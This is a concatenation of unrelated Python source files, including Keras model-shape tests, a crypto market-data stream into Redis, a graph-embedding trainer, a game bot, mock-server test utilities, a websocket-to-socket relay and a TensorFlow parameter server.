test_resnet50_notop(): model = applications.ResNet50(weights=None, include_top=False) assert model.output_shape == (None, None, None, 2048) @keras_test def test_resnet50_variable_input_channels(): input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1) model = applications.ResNet50(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 2048) input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4) model = applications.ResNet50(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 2048) @keras_test def test_resnet50_pooling(): model = applications.ResNet50(weights=None, include_top=False, pooling='avg') assert model.output_shape == (None, 2048) @keras_test def test_vgg16(): model = applications.VGG16(weights=None) assert model.output_shape == (None, 1000) @keras_test def test_vgg16_notop(): model = applications.VGG16(weights=None, include_top=False) assert model.output_shape == (None, None, None, 512) @keras_test def test_vgg16_variable_input_channels(): input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1) model = applications.VGG16(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 512) input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4) model = applications.VGG16(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 512) @keras_test def test_vgg16_pooling(): model = applications.VGG16(weights=None, include_top=False, pooling='avg') assert model.output_shape == (None, 512) @keras_test def test_vgg19(): model = applications.VGG19(weights=None) assert model.output_shape == (None, 1000) @keras_test def test_vgg19_notop(): model = applications.VGG19(weights=None, include_top=False) assert model.output_shape == (None, None, None, 512) @keras_test def test_vgg19_variable_input_channels(): input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1) model = applications.VGG19(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 512) input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4) model = applications.VGG19(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 512) @keras_test def test_vgg19_notop_specified_input_shape(): input_shape = (3, 300, 300) if K.image_data_format() == 'channels_first' else (300, 300, 3) model = applications.VGG19(weights=None, include_top=False, input_shape=input_shape) output_shape = (None, 512, 9, 9) if K.image_data_format() == 'channels_first' else (None, 9, 9, 512) assert model.output_shape == output_shape @keras_test def test_vgg19_pooling(): model = applications.VGG16(weights=None, include_top=False, pooling='avg') assert model.output_shape == (None, 512) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_xception(): model = applications.Xception(weights=None) assert model.output_shape == (None, 1000) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_xception_notop(): model = applications.Xception(weights=None, include_top=False) assert model.output_shape == (None, None, None, 2048) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_xception_pooling(): model = applications.Xception(weights=None, include_top=False, pooling='avg') assert model.output_shape == (None, 2048) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='Requires TensorFlow backend') def test_xception_variable_input_channels(): input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1) model = applications.Xception(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 2048) input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4) model = applications.Xception(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 2048) @keras_test def test_inceptionv3(): model = applications.InceptionV3(weights=None) assert model.output_shape == (None, 1000) @keras_test def test_inceptionv3_notop(): model = applications.InceptionV3(weights=None, include_top=False) assert model.output_shape == (None, None, None, 2048) @keras_test def test_inceptionv3_pooling(): model = applications.InceptionV3(weights=None, include_top=False, pooling='avg') assert model.output_shape == (None, 2048) @keras_test @pytest.mark.skipif((K.backend() == 'cntk'), reason='cntk does not support padding with non-concrete dimension') def test_inceptionv3_variable_input_channels(): input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1) model = applications.InceptionV3(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 2048) input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4) model = applications.InceptionV3(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 2048) @keras_test def test_inceptionresnetv2(): def model_fn(): return applications.InceptionResNetV2(weights=None) output_shape = clean_run(model_fn) assert output_shape == (None, 1000) @keras_test def test_inceptionresnetv2_notop(): def model_fn(): return applications.InceptionResNetV2(weights=None, include_top=False) output_shape = clean_run(model_fn) if K.image_data_format() == 'channels_first': assert output_shape == (None, 1536, None, None) else: assert output_shape == (None, None, None, 1536) @keras_test def test_inceptionresnetv2_pooling(): def model_fn(): return applications.InceptionResNetV2(weights=None, include_top=False, pooling='avg') output_shape = clean_run(model_fn) assert output_shape == (None, 1536) @keras_test def test_inceptionresnetv2_variable_input_channels(): def model_fn(input_shape): return applications.InceptionResNetV2(weights=None, include_top=False, input_shape=input_shape) output_shape = clean_run(lambda: model_fn((None, None, 1))) assert output_shape == (None, None, None, 1536) output_shape = clean_run(lambda: model_fn((None, None, 4))) assert output_shape == (None, None, None, 1536) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='MobileNets are supported only on TensorFlow') def test_mobilenet(): model = applications.MobileNet(weights=None) assert model.output_shape == (None, 1000) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='MobileNets are supported only on TensorFlow') def test_mobilenet_no_top(): model = applications.MobileNet(weights=None, include_top=False) assert model.output_shape == (None, None, None, 1024) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='MobileNets are supported only on TensorFlow') def test_mobilenet_pooling(): model = applications.MobileNet(weights=None, include_top=False, pooling='avg') assert model.output_shape == (None, 1024) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='MobileNets are supported only on TensorFlow') def test_mobilenet_variable_input_channels(): input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1) model = applications.MobileNet(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 1024) input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4) model = applications.MobileNet(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, 1024) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='MobileNets are supported only on TensorFlow') def test_mobilenet_image_size(): valid_image_sizes = [128, 160, 192, 224] for size in valid_image_sizes: input_shape = (size, size, 3) if K.image_data_format() == 'channels_last' else (3, size, size) model = applications.MobileNet(input_shape=input_shape, weights='imagenet', include_top=True) assert model.input_shape == (None,) + input_shape invalid_image_shape = (112, 112, 3) if K.image_data_format() == 'channels_last' else (3, 112, 112) with pytest.raises(ValueError): model = applications.MobileNet(input_shape=invalid_image_shape, weights='imagenet', include_top=True) @keras_test def test_densenet(): random.seed(time.time()) fun, _ = random.choice(DENSENET_LIST) def model_fn(): return fun(weights=None) output_shape = clean_run(model_fn) assert output_shape == (None, 1000) @keras_test def test_densenet_no_top(): random.seed(time.time()) fun, dim = random.choice(DENSENET_LIST) def model_fn(): return fun(weights=None, include_top=False) output_shape = clean_run(model_fn) assert output_shape == (None, None, None, dim) @keras_test def test_densenet_pooling(): random.seed(time.time()) fun, dim = random.choice(DENSENET_LIST) def model_fn(): return fun(weights=None, include_top=False, pooling='avg') output_shape = clean_run(model_fn) assert output_shape == (None, None, None, dim) @keras_test def test_densenet_variable_input_channels(): random.seed(time.time()) fun, dim = random.choice(DENSENET_LIST) def model_fn(input_shape): return fun(weights=None, include_top=False, input_shape=input_shape) output_shape = clean_run(lambda: model_fn((None, None, 1))) assert output_shape == (None, None, None, dim) output_shape = clean_run(lambda: model_fn((None, None, 4))) assert output_shape == (None, None, None, dim) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='NASNets are supported only on TensorFlow') def test_nasnet(): random.seed(time.time()) fun, _ = random.choice(NASNET_LIST) model = fun(weights=None) assert model.output_shape == (None, 1000) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='NASNets are supported only on TensorFlow') def test_nasnet_no_top(): random.seed(time.time()) fun, dim = random.choice(NASNET_LIST) model = fun(weights=None, include_top=False) assert model.output_shape == (None, None, None, dim) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='NASNets are supported only on TensorFlow') def test_nasnet_pooling(): random.seed(time.time()) fun, dim = random.choice(NASNET_LIST) model = fun(weights=None, include_top=False, pooling='avg') assert model.output_shape == (None, dim) @keras_test @pytest.mark.skipif((K.backend() != 'tensorflow'), reason='NASNets are supported only on TensorFlow') def test_nasnet_variable_input_channels(): random.seed(time.time()) fun, dim = random.choice(NASNET_LIST) input_shape = (1, None, None) if K.image_data_format() == 'channels_first' else (None, None, 1) model = fun(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, dim) input_shape = (4, None, None) if K.image_data_format() == 'channels_first' else (None, None, 4) model = fun(weights=None, include_top=False, input_shape=input_shape) assert model.output_shape == (None, None, None, dim) @pytest.mark.skipif(K.backend() != 'tensorflow', reason='Requires TF backend') @keras_test def test_depthwise_conv_2d(): _convolution_paddings = ['valid', 'same'] num_samples = 2 stack_size = 3 num_row = 7 num_col = 6 with CustomObjectScope({'relu6': applications.mobilenet.relu6, 'DepthwiseConv2D': applications.mobilenet.DepthwiseConv2D}): for padding in _convolution_paddings: for strides in [(1, 1), (2, 2)]: for multiplier in [1, 2]: if padding == 'same' and strides != (1, 1): continue layer_test(applications.mobilenet.DepthwiseConv2D, kwargs={'kernel_size': (3, 3), 'padding': padding, 'strides': strides, 'depth_multiplier': multiplier}, input_shape=(num_samples, num_row, num_col, stack_size)) layer_test(applications.mobilenet.DepthwiseConv2D, kwargs={'kernel_size': 3, 'padding': padding, 'data_format': 'channels_first', 'activation': None, 'depthwise_regularizer': 'l2', 'bias_regularizer': 'l2', 'activity_regularizer': 'l2', 'depthwise_constraint': 'unit_norm', 'strides': strides, 'depth_multiplier': multiplier}, input_shape=(num_samples, stack_size, num_row, num_col)) # Test invalid use case with pytest.raises(ValueError): model = Sequential([applications.mobilenet.DepthwiseConv2D(kernel_size=3, padding=padding, batch_input_shape=(None, None, 5, None))]) if __name__ == '__main__': pytest.main([__file__])
Chap10_Example10.19.py
from threading import Thread daemonchk = False def disp(): if daemonchk: print('Display function only if it is daemon thread') else: print("Non-daemon thread") threadobj = Thread(target = disp) print("Before setting thread as daemon: ", threadobj.daemon) threadobj.daemon = True if threadobj.daemon: daemonchk = True threadobj.start()
crypto_stream.py
import polygon from polygon import StreamClient, enums import datetime from datetime import datetime import time import threading import config import traceback import requests import redis import json print("starting stream...") key = config.polygon_key def connections(): # redis_pool = redis.ConnectionPool(host=config.redis_host, port=config.redis_port, db=0, password=config.redis_pw) redis_pool = redis.ConnectionPool(connection_class=redis.UnixDomainSocketConnection, path="/var/run/redis/redis-server.sock", password=config.redis_pw, db=0) r = redis.Redis(connection_pool=redis_pool, charset="utf-8", decode_responses=True) print('redis connected', r, redis_pool) return r def redis_message(messages): for message in messages: r.rpush('crypto-list', json.dumps(message)) return None def unix_convert(ts): ts = int(ts/1000) tdate = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') return tdate def save_data(message): z = time.time() keys = {'pair': 'pair', 'v': 'tick_volume', 'vw': 'tick_vwap', 'z': 'avg_trade_size', 'o': 'tick_open', 'c': 'tick_close', 'h': 'tick_high', 'l': 'tick_low', 's': 'time_beg', 'e': 'time_end'} # Drop Unknown Keys key_count = len(message[0].keys()) if key_count > len(keys.keys())+1: message = [{k: single[k] for k in keys if k in single} for single in message] print('New fields detected! Check API documentation: https://polygon.io/docs/websockets/') else: message = [{k: single[k] for k in keys if k in single} for single in message] new_message = [] for d in message: # del d['ev'] # delete status d = {keys[name]: val for name, val in d.items()} d['tdate'] = unix_convert(d['time_end']) d['save_date'] = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S') cols = ['pair', 'tick_volume', 'tick_vwap', 'avg_trade_size', 'tick_open', 'tick_close', 'tick_high', 'tick_low', 'time_beg', 'time_end', 'tdate', 'save_date'] d = {k: d[k] for k in cols} new_message.append(d) redis_message(new_message) # print(message) print(datetime.utcnow(), 'crypto', time.time()-z) return None def my_custom_process_message(ws, msg): message = json.loads(msg) if message[0]['ev'] != 'status': threading.Thread(target=save_data, args=[message]).start() return None def my_custom_error_handler(ws, error): raise ValueError('an error happened:', error) def my_custom_close_handler(ws, close_code, close_msg): print("closed connection", close_code, close_msg) return None def main(): # my_client = polygon.StreamClient(key, polygon.enums.StreamCluster('stocks'), on_message=my_custom_process_message, # on_close=my_custom_close_handler, on_error=my_custom_error_handler) my_client = polygon.StreamClient(key, polygon.enums.StreamCluster('crypto'), on_message=my_custom_process_message, on_close=my_custom_close_handler, on_error=my_custom_error_handler) try: my_client.start_stream_thread() # my_client.subscribe_stock_second_aggregates() my_client.subscribe_crypto_minute_aggregates() # my_client.subscribe_stock_trades() except Exception: traceback.print_exc() # my_client.unsubscribe_stock_second_aggregates() my_client.unsubscribe_crypto_minute_aggregates() # my_client.unsubscribe_stock_trades_aggregates() return None def internet_check(): url = "https://socket.polygon.io" timeout = 15 try: requests.get(url, timeout=timeout) connected = True print('Internet connected') except (requests.ConnectionError, requests.Timeout): connected = False print('No Internet') return connected if __name__ == "__main__": connected = internet_check() if connected: try: r = connections() main() except Exception: traceback.print_exc() time.sleep(1) connected = internet_check() while not connected: connected = internet_check() time.sleep(5) while not connected: connected = internet_check() time.sleep(5) continue
line.py
from pysmore.libs import graph, optimizer, embedding, util import multiprocessing as mp ### global variables ### globalVariables = { 'graph': None, 'optimizer': optimizer.get_loglikelihood_loss, 'updater': embedding.update_l2_embedding, 'progress': util.print_progress, 'init_alpha': 0.025, 'num_negative': 5 } current_update_times = mp.RawValue('i', 0) vertexEmbed = None contextEmbed = None ###### ### user functions ### def create_graph(train_path, embedding_dimension=64, delimiter='\t'): global globalVariables global vertexEmbed global contextEmbed globalVariables['graph'] = graph.Graph(train_path, delimiter=delimiter, mode='node', undirected=True) print('create embeddings...', end='', flush=True) vertexEmbed = embedding.create_embeddings_unsafe( amount=globalVariables['graph'].vertex_count, dimensions=embedding_dimension) contextEmbed = embedding.create_embeddings_unsafe( amount=globalVariables['graph'].context_count, dimensions=embedding_dimension) print('DONE', flush=True) return vertexEmbed, globalVariables['graph'].vertex_mapper def set_param(params): global globalVariables for key in params: globalVariables[key] = params[key] def train(update_times=10, workers=1): global globalVariables globalVariables['total_update_times'] = int(update_times * 1000000) globalVariables['workers'] = workers globalVariables['worker_update_times'] = int((update_times * 1000000)/workers) globalVariables['min_alpha'] = globalVariables['init_alpha'] * 1000 / globalVariables['total_update_times'] #util.optimize_numpy_multiprocessing(workers) processes = [] for i in range(workers): globalVariables['graph'].initialize_random_state() # otherwise each process uses the same random seed p = mp.Process(target=learner, args=()) p.start() processes.append(p) for p in processes: p.join() current_update_times.value = 0 globalVariables['progress'](1.0) def save_embeddings(file_prefix="line"): global globalVariables global vertexEmbed global contextEmbed print() embedding.save_embeddings(vertexEmbed, globalVariables['graph'].vertices, file_prefix+'_all') ###### ### main learner ### def learner(): globalVariables['graph'].cache_vertex_samples(globalVariables['worker_update_times']) globalVariables['progress'](0.0) monitor_flag = int(1e3) _learning_rate = globalVariables['init_alpha'] for i in range(1, globalVariables['worker_update_times']+1): vertex, vertex_idx = globalVariables['graph'].draw_a_vertex_from_sample() context, context_pos_idx = globalVariables['graph'].draw_a_context(vertex) vertex_embedding = vertexEmbed[vertex_idx] context_pos_embedding = contextEmbed[context_pos_idx] vertex_loss, context_pos_loss = \ globalVariables['optimizer'](vertex_embedding, context_pos_embedding, 1.0) globalVariables['updater'](contextEmbed, context_pos_idx, context_pos_loss, _learning_rate) context_neg, context_neg_idxs = \ globalVariables['graph'].draw_contexts_uniformly(amount=globalVariables['num_negative']) for context_neg_idx in context_neg_idxs: context_neg_embedding = contextEmbed[context_neg_idx] vertex_neg_loss, context_neg_loss = \ globalVariables['optimizer'](vertex_embedding, context_neg_embedding, 0.0) globalVariables['updater'](contextEmbed, context_neg_idx, context_neg_loss, _learning_rate) vertex_loss += vertex_neg_loss globalVariables['updater'](vertexEmbed, vertex_idx, vertex_loss, _learning_rate) if i % monitor_flag == 0: current_progress_percentage = current_update_times.value / globalVariables['total_update_times'] _learning_rate = globalVariables['init_alpha'] * (1.0 - current_progress_percentage) _learning_rate = max(globalVariables['min_alpha'], _learning_rate) current_update_times.value += monitor_flag globalVariables['progress'](current_progress_percentage) ######
runbot.py
#!/usr/bin/python import logging import argparse import threading from server import ServerMessageTypes, ServerComms from statemachine import StateMachine import time # Parse command line args parser = argparse.ArgumentParser() parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output') parser.add_argument('-H', '--hostname', default='127.0.0.1', help='Hostname to connect to') parser.add_argument('-p', '--port', default=8052, type=int, help='Port to connect to') parser.add_argument('-n', '--name', default='TimScorer', help='Name of bot') args = parser.parse_args() # Set up console logging if args.debug: logging.basicConfig( format='[%(asctime)s] %(message)s', level=logging.DEBUG) else: logging.basicConfig(format='[%(asctime)s] %(message)s', level=logging.INFO) # Connect to game server GameServer = ServerComms(args.hostname, args.port) # Spawn our tank logging.info("Creating tank with name '{}'".format(args.name)) GameServer.sendMessage(ServerMessageTypes.CREATETANK, {'Name': args.name}) state_machine = StateMachine(GameServer=GameServer, name=args.name) lock = threading.Lock() def recieve_messages(): while True: message = GameServer.readMessage() lock.acquire() state_machine.update(message) lock.release() def run_state_machine(): while True: lock.acquire() state_machine.choose_state() state_machine.perform_current_state() lock.release() time.sleep(0.2) message_thread = threading.Thread(target=recieve_messages) message_thread.start() state_machine_thread = threading.Thread(target=run_state_machine) state_machine_thread.start()
utilities.py
#!/usr/bin/python3 # -*- coding: utf-8 -*- import sys import socket import time import signal import io import uuid import logging import http.server import socketserver from os import path, chdir from unittest.mock import patch from multiprocessing import Process import contextlib from mockintosh.constants import PROGRAM from mockintosh import initiate __location__ = path.abspath(path.dirname(__file__)) class DefinitionMockForAsync: def __init__(self, source_dir, template_engine, rendering_queue): self.source_dir = source_dir self.template_engine = template_engine self.rendering_queue = rendering_queue self.data = {} self.logs = None self.stats = None class SimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): # noqa: N802 http.server.SimpleHTTPRequestHandler.do_GET(self) def do_POST(self): # noqa: N802 http.server.SimpleHTTPRequestHandler.do_GET(self) def signal_handler(sig, frame): pass def tcping(host, port=65533, timeout=2): s = socket.socket() s.settimeout(timeout) result = False end = None try: start = time.time() s.connect((host, port)) s.close() result = True end = time.time() except Exception: logging.warning('Pinging to %s:%s is failed!', host, port) end = time.time() ms = 1000 * (end - start) return result, round(ms, 2) def run_mock_server(*args, wait=10): """ :rtype: Process """ mock_server_process = None testargs = [PROGRAM, *args] with patch.object(sys, 'argv', testargs): mock_server_process = Process(target=initiate, args=()) mock_server_process.start() signal.signal(signal.SIGALRM, signal_handler) signal.sigtimedwait([signal.SIGALRM], wait) return mock_server_process def get_config_path(config): return path.join(__location__, config) @contextlib.contextmanager def nostdout(): """Method to suppress the standard output. (use it with `with` statements) """ save_stdout = sys.stdout sys.stdout = io.StringIO() yield sys.stdout = save_stdout @contextlib.contextmanager def nostderr(): """Method to suppress the standard error. (use it with `with` statements) """ save_stderr = sys.stderr sys.stderr = io.StringIO() yield sys.stderr = save_stderr def is_valid_uuid(val, version=4): try: uuid.UUID(str(val), version=version) return True except ValueError: return False def is_ascii(s): return all(ord(c) < 128 for c in s) def _start_simple_http_server_on_path(_path: str, port: int): web_dir = path.join(path.dirname(__file__), _path) chdir(web_dir) httpd = socketserver.TCPServer(("", port), SimpleHTTPRequestHandler) httpd.serve_forever() def start_simple_http_server_on_path(_path: str, port: int): simple_http_server_process = Process(target=_start_simple_http_server_on_path, args=(_path, port)) simple_http_server_process.start() return simple_http_server_process
relay.py
''' Copyright (c) 2016-2017 Wind River Systems, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ''' """ This module contains the Relay class which is a secure way to pipe data to a local socket connection. This is useful for Telnet which is not secure by default. """ import logging import random import select import socket import ssl import threading # yocto supports websockets, not websocket, so check for that try: import websocket except ImportError: import websockets as websocket CONNECT_MSG = "CONNECTED-129812" class Relay(object): """ Class for establishing a secure pipe between a cloud based websocket and a local socket. This is useful for things like Telnet which are not secure to use remotely. """ def __init__(self, wsock_host, sock_host, sock_port, secure=True, log=None): """ Initialize a relay object for piping data between a websocket and a local socket """ self.wsock_host = wsock_host self.sock_host = sock_host self.sock_port = sock_port self.secure = secure self.log = log self.log_name = "Relay:{}:{}({:0>5})".format(self.sock_host, self.sock_port, random.randint(0,99999)) if self.log is None: self.logger = logging.getLogger(self.log_name) log_handler = logging.StreamHandler() #log_formatter = logging.Formatter(constants.LOG_FORMAT, datefmt=constants.LOG_TIME_FORMAT) #log_handler.setFormatter(log_formatter) self.logger.addHandler(log_handler) self.logger.setLevel(logging.DEBUG) self.log = self.logger.log self.running = False self.thread = None self.lsock = None self.wsock = None def _loop(self): """ Main loop that pipes all data from one socket to the next. The websocket connection is established first so this is also where the local socket connection will be started when a specific string is received from the Cloud """ while self.running is True: # Continuously receive data from each socket and send it through the # other socket_list = [self.wsock] if self.lsock: socket_list.append(self.lsock) read_sockets, _ws, _es = select.select(socket_list, [], [], 1) for sock in read_sockets: if sock == self.wsock: try: op, data_in = sock.recv_data() except websocket.WebSocketConnectionClosedException: self.running = False break if data_in: if self.lsock: self.lsock.send(data_in) elif data_in == CONNECT_MSG: # If the local socket has not been established yet, # and we have received the connection string, start # local socket. try: self.lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.lsock.connect((self.sock_host, self.sock_port)) except socket.error: self.running = False self.log(logging.ERROR, "%s - Failed to open local socket", self.log_name) break self.log(logging.INFO, "%s - Local socket successfully opened", self.log_name) else: self.log(logging.INFO, "%s - Received NULL from websocket, Stopping", self.log_name) self.running = False break elif self.lsock and sock == self.lsock: data_in = sock.recv(4096) if data_in: self.wsock.send_binary(data_in) else: self.log(logging.INFO, "%s - Received NULL from socket, Stopping", self.log_name) self.running = False break if self.lsock: self.lsock.close() self.lsock = None self.wsock.close() self.wsock = None self.log(logging.INFO, "%s - Sockets Closed", self.log_name) def start(self): """ Establish the websocket connection and start the main loop """ if not self.running: self.running = True sslopt = {} if not self.secure: sslopt["cert_reqs"] = ssl.CERT_NONE # Connect websocket to Cloud self.wsock = websocket.WebSocket(sslopt=sslopt) try: self.wsock.connect(self.wsock_host) except ssl.SSLError as error: self.running = False self.wsock.close() self.wsock = None self.log(logging.ERROR, "%s - Failed to open Websocket", self.log_name) raise error self.log(logging.INFO, "%s - Websocket Opened", self.log_name) self.thread = threading.Thread(target=self._loop) self.thread.start() else: raise RuntimeError("{} - Already running!".format(self.log_name)) def stop(self): """ Stop piping data between the two connections and stop the loop thread """ self.log(logging.INFO, "%s - Stopping", self.log_name) self.running = False if self.thread: self.thread.join() self.thread = None relays = [] def create_relay(url, host, port, secure=True, log_func=None): global relays newrelay = Relay(url, host, port, secure=secure, log=log_func) newrelay.start() relays.append(newrelay) def stop_relays(): global relays threads = [] while relays: relay = relays.pop() thread = threading.Thread(target=relay.stop) thread.start() threads.append(thread) for thread in threads: thread.join()
multi_ps_async_part2.py
from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import sys import cPickle as pickle import socket from multiprocessing import Process, Queue, Value, Manager from ctypes import c_char_p from datetime import datetime import time import tensorflow as tf import cifar10 TCP_IP = '127.0.0.1' s = 0 MAX_WORKERS = 0 FLAGS = tf.app.flags.FLAGS tf.app.flags.DEFINE_string('train_dir', '/home/ubuntu/cifar10_train', """Directory where to write event logs """ """and checkpoint.""") tf.app.flags.DEFINE_integer('max_steps', 100002, """Number of batches to run.""") tf.app.flags.DEFINE_boolean('log_device_placement', False, """Whether to log device placement.""") tf.app.flags.DEFINE_integer('log_frequency', 100, """How often to log results to the console.""") gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.25) def safe_recv(size, server_socket): data = '' temp = '' recv_size = 0 while 1: try: temp = server_socket.recv(size-len(data)) data += temp recv_size = len(data) if recv_size >= size: break except: print("Error") return data def handleWorker(port,gradients_q,global_var_vals): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print("Connecting to port : ", port) s.bind((TCP_IP, port)) s.listen(1) conn, addr = s.accept() print('Connection address:', addr) while 1: size = safe_recv(8,conn) size = pickle.loads(size) data = safe_recv(size,conn) #print("Received size: ", size) local_worker_gradients = pickle.loads(data) gradients_q.put(local_worker_gradients) size = len(global_var_vals.value) size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL) conn.sendall(size) conn.sendall(global_var_vals.value) conn.close() s.close() def train(): """Train CIFAR-10 for a number of steps.""" g1 = tf.Graph() with g1.as_default(): # Build a Graph that trains the model with one batch of examples and # updates the model parameters. #global_step = tf.contrib.framework.get_or_create_global_step() global_step = tf.Variable(-1, name='global_step', trainable=False, dtype=tf.int32) increment_global_step_op = tf.assign(global_step, global_step+1) cifar10.build_graph_part2() placeholder_gradients = [] #with tf.device("/gpu:0"): for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES): placeholder_gradients.append((tf.placeholder('float', shape=var.get_shape()) ,var)) feed_dict = {} i=0 for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES): feed_dict[placeholder_gradients[i][0]] = np.zeros(placeholder_gradients[i][0].shape) i=i+1 train_op = cifar10.train_part2(global_step,placeholder_gradients) class _LoggerHook(tf.train.SessionRunHook): """Logs loss and runtime.""" def begin(self): self._step = -1 self._start_time = time.time() def before_run(self, run_context): self._step += 1 def after_run(self, run_context, run_values): if self._step % FLAGS.log_frequency == 0: current_time = time.time() duration = current_time - self._start_time self._start_time = current_time examples_per_sec = FLAGS.log_frequency * FLAGS.batch_size / duration sec_per_batch = float(duration / FLAGS.log_frequency) format_str = ('%s: step %d,(%.1f examples/sec; %.3f ' 'sec/batch)') print (format_str % (datetime.now(), self._step, examples_per_sec, sec_per_batch)) with tf.train.MonitoredTrainingSession( checkpoint_dir=FLAGS.train_dir, hooks=[tf.train.StopAtStepHook(last_step=FLAGS.max_steps), _LoggerHook()], config=tf.ConfigProto( log_device_placement=FLAGS.log_device_placement, gpu_options=gpu_options)) as mon_sess: for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES): print(v) # Sending the initial value of variables var_val = [] for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES): var_val.append(mon_sess.run(v, feed_dict=feed_dict)) send_data = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL) global global_var_vals global_var_vals.value = send_data size = len(send_data) size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL) for i in xrange(MAX_WORKERS): conn, addr = s.accept() conn.sendall(size) conn.sendall(send_data) conn.close() print("Sent initial var values to workers") while not mon_sess.should_stop(): val = mon_sess.run(global_step, feed_dict=feed_dict) #print("Iteration: ", val) if(val == (FLAGS.max_steps - 1)): print("Global step val while stoping.") sys.exit() recv_grads = gradients_q.get() #print("received gradients from worker") feed_dict = {} for i,grad_var in enumerate(recv_grads): feed_dict[placeholder_gradients[i][0]] = recv_grads[i] res = mon_sess.run(train_op, feed_dict=feed_dict) var_val = [] #print("Run complete with new values") for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES): var_val.append(mon_sess.run(v, feed_dict=feed_dict)) global global_var_vals global_var_vals.value = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL) #print("New values of variables sent ") def main(argv=None): # pylint: disable=unused-argument if(len(sys.argv) != 3): print("<port> <no of workers> required") sys.exit() global s global port global MAX_WORKERS port = int(sys.argv[1]) MAX_WORKERS = int(sys.argv[2]) global gradients_q global global_var_vals gradients_q = Queue() manager = Manager() global_var_vals = manager.Value(c_char_p, "") for i in xrange(MAX_WORKERS): process_port = port + i + 1 p = Process(target=handleWorker, args=(process_port,gradients_q,global_var_vals)) p.daemon=True p.start() cifar10.maybe_download_and_extract() if tf.gfile.Exists(FLAGS.train_dir): tf.gfile.DeleteRecursively(FLAGS.train_dir) tf.gfile.MakeDirs(FLAGS.train_dir) total_start_time = time.time() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print("Connecting to port : ", port, " and no of workers: ", MAX_WORKERS) s.bind((TCP_IP, port)) s.listen(1) train() print("--- %s seconds ---" % (time.time() - total_start_time)) if __name__ == '__main__': tf.app.run()
example_1.py
import time from multiprocessing import Process from threading import Thread import requests def calculate() -> None: for _ in range(50): previous_value = 0 pre_previous_value = 1 current_value = None for _ in range(50_000): current_value = previous_value + pre_previous_value pre_previous_value = previous_value previous_value = current_value def load_person_data(person_id: int) -> None: swapi_people_url = "https://swapi.dev/api/people/" person_url = f"{swapi_people_url}{person_id}" requests.get(url=person_url) # def do_work() -> None: # calculate_thread = Thread(target=calculate) # calculate_thread.start() # # data_loader_threads: list[Thread] = [] # for person_id in range(1, 10): # data_loader_thread = Thread(target=load_person_data, args=(person_id,)) # data_loader_threads.append(data_loader_thread) # data_loader_thread.start() # # calculate_thread.join() # for thread in data_loader_threads: # thread.join() def do_work() -> None: calculate() for person_id in range(1, 10): load_person_data(person_id) def run_example() -> None: # start_time = time.perf_counter() # workers: list[Process] = [] # for _ in range(2): # process = Process(target=do_work) # workers.append(process) # process.start() # # for process in workers: # process.join() # # end_time = time.perf_counter() # 